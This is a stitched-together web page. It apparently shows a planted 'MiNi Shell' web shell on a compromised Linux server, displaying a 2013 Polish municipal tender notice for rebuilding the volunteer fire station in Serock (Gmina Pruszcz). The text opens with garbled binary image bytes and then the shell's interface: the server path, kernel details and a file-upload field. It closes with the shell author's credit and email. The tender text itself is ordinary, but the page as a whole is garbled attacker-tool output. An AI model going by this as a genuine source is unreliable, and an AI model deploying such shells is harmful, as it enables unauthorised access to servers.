JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130712/142369-N-2013.html

<p class="kh_header"><b>Pruszcz: Przebudowa budynku remizy OSP w Serocku</b><br>
<b>Numer ogłoszenia: 142369 - 2013; data zamieszczenia: 12.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pruszcz , ul. Główna 33, 86-120 Pruszcz, woj. kujawsko-pomorskie, tel. 52 562 43 00, faks 52 562 43 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pruszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa budynku remizy OSP w Serocku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Nazwa zadania:  Przebudowa budynku remizy OSP w Serocku

 I.      DANE OGÓLNE
1. Cel opracowania
Przebudowa budynku Remizy OSP w Serocku, zlokalizowanej na działce nr 323, w miejscowości Serock, przy ul. Dworcowej 1, 86-120 Pruszcz,. Istniejący budynek remizy strażackiej jest budynkiem wolnostojącym, murowanym, niepodpiwniczonym, parterowym, z poddaszem nieużytkowym, z dachem dwuspadowym, konstrukcji drewnianej, o ustroju krokwiowo-jętkowym, krytym płytami azbestowo-cementowymi. 

II. CHARAKTERYSTYKA PRAC
1. Projektowany przebieg prac:
Przewiduje się dodatkowe prace nie ujęte w branży architektoniczno-konstrukcyjnej projektu podstawowego:
1. Wykonanie fundamentów oraz ścian nośnych w części budynku,
2. Zamurowanie części otworów okiennych i drzwiowych,
3. Rozbiórkę oraz wykonanie nowej posadzki w części parteru,
4. Wykonanie schodów wewnętrznych,
5. Wykonanie podciągu w stropie poddasza,
6. Wykonanie tynków i malowanie ścian,
7. Wymiana stolarki okiennej i drzwiowej,
8. Wzmocnienie stropu nad poddaszem,
9. Wykonanie izolacji termicznej ze styropianu (ściana zewnętrzna),
10. Wymiana poszycia dachowego wraz z orynnowaniem,
11. Wykonanie przekuć okiennych i drzwiowych w istniejącym obiekcie,
12. Wykonanie opaski z kostki betonowej wokół budynku,
2. Program użytkowy
Parter
K Klatka schodowa 1,99 m2
1/1 Komunikacja 1,76 m2
1/2 Pomieszczenie biurowe 24,30 m2
1/3 Pomieszczenie garażowe 106,40 m2
1/4 Pomieszczenie gospodarcze 5,02 m2
1/5 Pomieszczenie gospodarcze 5,04 m2
1/6 Pomieszczenie gospodarcze 5,14 m2
1/7 Węzeł sanitarny 7,60 m2 m2
Razem 157,25m2
Poddasze
K Klatka schodowa 1,99 m2
2/1 Strych 30,04 m2
Razem 32,03 m2
Ogółem 189,28 m2
3. Opis konstrukcyjno materiałowy remontu
Projektowane prace remontowe w części południowo-zachodniej
ad. 1 Wykonanie fundamentów oraz ścian nośnych
Fundamenty pod nowoprojektowane ściany nośne należy wykonać z bloczków betonowych gr. 25cm, murowanych na zaprawie cementowej. Ławy fundamentowe o szerokości 40cm i wysokości 30cm należy wykonać z betonu B20, na podkładzie betonowym (B-10) gr. 10cm. Ławy fundamentowe zbroić prętami ?12 A-III /34GS/, strzemiona 6 A-I /St3S/ co 30 cm. Ściany fundamentowe należy pomalować dwukrotnie lepikiem asfaltowym, oraz oddylatować od projektowanych ścian warstwą styropianu gr.2cm. Ściany nośne gr. 24 cm, z bloczków betonu komórkowego gr. 24 cm, klasy co najmniej 600, murowane na zaprawie cementowo - wapiennej marki M4. Nad otworami okiennymi i drzwiowymi nadproża z prefabrykowanych belek nadprożowych typu L-19, długości belek dostosowane do rozpiętości otworu
ad. 2 Zamurowanie części otworów okiennych i drzwiowych

Norma PRO Wersja 4.40 Nr seryjny: 20177 Użytkownik: Budomex
OGÓLNA CHARAKTERYSTYKA OBIEKTU
Niezbędne zamurowania wykonać z bloczków betonu komórkowego gr. 24cm na zaprawie cementowo-wapiennej.
ad. 3 Wykonanie nowej posadzki parteru
Poziom nowoprojektowanej posadzki należy dopasować do poziomu istniejącej posadzki w części garażowej. Warstwy posadzki od dołu: podsypka piaskowa gr. 10cm, podkład betonowy B10 gr. 6cm, styropian EPS 100 gr. 10cm, gładź cementowa gr. 5cm, tarket.
ad. 4 Wykonanie schodów wewnętrznych. Projektuje się wykonanie schodów zabiegowych żelbetowych zgodnie z rysunkiem rzutu przyziemia, płytowe, gr. 12 cm, żelbetowe, zbrojenie główne prętami ?12, stal A-III /34GS/, w rozstawie co 10 cm, zbrojenie rozdzielcze pręty ?8 co 25 cm, stal A-0 /St0S/, beton B20. Balustrada wewnętrzna oraz poręcz stalowa o wys. 1,1m. 
ad. 5 Wykonanie podciągu w stropie poddasza. Podciąg w stropie poddasza należy wykonać z 3 belek stalowych dwuteowych I120 /St3S/ zamocowanych w ścianach. Do podciągu należy zamocować belki istniejącego stropu żelbetowego. Podciąg zamocować w ścianach poprzez wykucie gniazd i wykonanie poduszek betonowych gr. 20cm, a dopiero na nich należy osadzić podciąg.
ad. 6 Wykonanie tynków i malowanie ścian. Tynki wewnętrzne cementowo-wapienne kat. III, wykończone gładzią szpachlową oraz płyta gipsowo-kartonowymi, typ GKFI gr. 12, 5mm. Malowanie ścian wewnętrznych i sufitów farbą emulsyjną lub akrylową 2-krotnie, w dowolnym kolorze, wg uznania Inwestora,
Kolorystyka:
DACH - blacha dachówkowa w kolorze brązowym,
ŚCIANY ZEWNĘTRZNE - tynk cienkowarstwowy oraz cementowo-wapienny w kolorze jasno-żółtym,
RYNNY I RURY SPUSTOWE - PCV w kolorze brązowym,
OKNA i DRZWI - PCV w kolorze białym i czerwonym,
ad. 7 Wymiana stolarki okiennej i drzwiowej
Projektuje się stolarkę okienną PCV, drzwiową wewnętrzną drewnianą oraz drzwiową zewnętrzną z płyty warstwowej. Nad projektowanym
wejściem do budynku należy zamontować zadaszenie z poliwęglanu na konstrukcji wsporczej stalowej. Parapety wewnętrzne z
PCV, zewnętrzne metalowe lakierowane w kolorze pokrycia z blachy dachówkowej.
ad. 8 Wzmocnienie stropu nad poddaszem
Istniejący strop nad poddaszem należy wzmocnić poprzez wmontowanie do konstrukcji stropu trzech dwuteowników IPE120, ze stali
St3S, w środku rozpiętości stropu, opartych na ścianie oraz słupie stalowym z dwóch ceowników C120, ze stali St3S. Słup stalowy oparty
na stopie fundamentowej, żelbetowej o wym. 60x60x40cm, z betonu B20, zbrojenie siatką z prętów 12 w rozstawie co 10cm, Stopę
fundamentową należy wykonać na warstwie chudego betonu B10 gr. 10 cm.
ad. 9 Wykonanie izolacji termicznej ze styropianu (ściana zewnętrzna)
Izolację należy wykonać ze styropianu EPS-70 gr. 8cm. Dodatkowo należy wykonać na tej części elewacji tynk cienkowarstwowy w technologii NRO.
W tylnej części obiektu, oraz od strony północno-wschodniej należy wykonać tynki cementowo-wapienne i pomalować je na kolor jasnożółty zgodnie z tynkami w pozostałej części obiektu. Kolorystyka elewacji zgodnie rysunkami zawartymi w części graficznej opracowania.
ad. 10 Wymiana poszycia dachowego wraz z orynnowaniem
Projektuje się zdjęcie poszycia dachowego z płyty falistej (azbestowo-cementowej). Prace związane z rozbiórką pokrycia dachowego z płyt eternitu falistego, zgodnie z Rozporządzeniem Ministra Gospodarki, z dnia 14 sierpnia 1998 r., (Dz. U. Nr 138, poz. 895) w sprawie zasobów bezpiecznego użytkowania oraz warunków usuwania wyrobów zawierających azbest, mogą być wykonywane wyłącznie przez wykonawców posiadających odpowiednie wyposażenie techniczne do prowadzenia takich prac. Wykonawcy powinni posiadać zezwolenie na prowadzenie tego rodzaju robót oraz posiadać przeszkolenie pracowników w zakresie bhp, przy usuwaniu i wymianie materiałów zawierających azbest.
Dodatkowo projektuje się zdjęcie łat drewnianych na całej połaci dachowej, wykonanie nowego łacenia z łat 5x6cm w rozstawie 35cm, kontrłat drewnianych 5x2,5cm, pełnego deskowania pokrytego papą termozgrzewalną oraz poszycia dachowego z blachy dachówkowej. Drewno przed wmontowaniem do konstrukcji należy zaimpregnować wg zaleceń producentów, środkiem grzybobójczym i owadobójczym oraz ogniochronnym do granicy niezapalności np. Holz Prof. Istniejące rynny dachowe należy zdemontować i zamontować nowe z PCV. W przypadku rynien PCV mocowanie haków co 50cm, uchwyty do rynny półokrągłe wg BN-66/5059-02 mocowane śrubami M6/25. Rynny o średnicy 120 mm, rury spustowe o średnicy 100 mm. Woda odprowadzana będzie na terenie działki Inwestora.
ad.11 Wykonanie przekuć okiennych i drzwiowych w istniejącym obiekcie Projektuje się wykucie otworów drzwiowych i okiennych zgodnie z rzutami przyziemia. 
ad. 12 Wykonanie opaski z kostki betonowej wokół budynku
Opaskę należy wykonać z kostki brukowej, betonowej na podsypce cementowo-piaskowej gr. 5cm. Od strony zewnętrznej należy ułożyć
obrzeże betonowe o wym. 100x20x6 cm na podsypce piaskowej z wypełnieniem spoin zaprawą cementowo-piaskową.


Szczegółowy opis przedmiotu zamówienia zawiera przedmiar robót, dokumentacja techniczna oraz specyfikacja techniczna wykonania i odbioru robót - załączniki do niniejszego opisu.

Zamawiający we wszystkich miejscach opisu przedmiotu zamówienia, w których jest wskazanie pochodzenia, patentu producenta dopuszcza zastosowanie materiału, urządzenia, sprzętu równoważnego pod warunkiem zapewnienia parametrów nie gorszych niż określono w dokumentacji projektowej. Koszty zmian materiałów ponosi wykonawca..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6. PZP w wysokości do 20% wartości szacunkowej zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-0, 45.26.10.00-0, 45.41.00.00-0, 45.43.00.00-0, 45.33.00.00-0, 45.40.00.00-0, 45.21.33.16-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> - Informacja na temat wadium: Kwota wadium wynosi: 1.000,00 zł.
- Wadium wnosi się przed upływem terminu na składanie ofert.
- Wadium może być wnoszone w jednej lub kilku następujących formach:
-  pieniądzu;
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- Gwarancjach bankowych;
- Gwarancjach ubezpieczeniowych;
- Poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9      listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
Gwarancje i poręczenia winny zostać złożone zamawiającemu wyłącznie w formie dokumentu oryginalnego.
Wadium wniesione w pieniądzu należy wpłacić na konto: 54 8170 0008 0000 0550 2000 0020  z dopiskiem, (jakiego postępowania dotyczy) w terminie do dnia 02.08.2013 r. do godz. 12:00 - a kopię dowodu wpłaty dołączyć do oferty.
Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
Wykonawca w zależności od wybranej formy wadium oryginał lub kopie dołącza do oferty.
Wadium powinno obejmować cały okres związania ofertą.
Za termin wniesienia wadium uważa się datę wpłynięcia środków na konto Zamawiającego.
Wykonawca, który nie wniósł wadium, w tym na przedłużony okres związania ofertą lub nie zgodził się na przedłużenie okresu związania ofertą zgodnie z art. 24 ust.2 pkt. 2 ustawy Prawo zamówień publicznych zostanie wykluczony z przedmiotowego postępowania.
Zamawiający zwróci lub zatrzyma wadium zgodnie z art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Powyższy warunek wykonawca spełni składając oświadczenie z art. 22 ust. 1 pkt. 1 ustawy na zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykonał - wykonali minimum 2 zadania z zakresu porównywalnego rodzaju robót budowlanych i remontowych/ wykonali 2 zadania o wartości minimum 0,1 mln PLN z potwierdzeniem, że te zadania zostały wykonane terminowo i zgodnie z zasadami sztuki budowlanej,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku potencjału technicznego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca będzie dysponował;
kierownikiem robót branży ogólnobudowlanej lub konstrukcyjno-budowlanej z wymaganymi uprawnieniami minimum 3 lata lub dokumentami równoważnymi.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponują płynnością finansową na kwotę min. 0,1 mln zł,
- posiadają ubezpieczenie z tytułu prowadzonej działalności gospodarczej na sumę ubezpieczenia min. 0,1 mln zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ofertę cenową zgodną z załączonym drukiem Oferty cenowej, Kosztorys ofertowy sporządzony na podstawie przedmiaru robót stanowiącego,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pruszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Pruszcz 
ul. Główna 33, 86-120 Pruszcz
biuro nr 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.08.2013 godzina 12:00, miejsce: Urząd Gminy Pruszcz 
ul. Główna 33, 86-120 Pruszcz
biuro nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com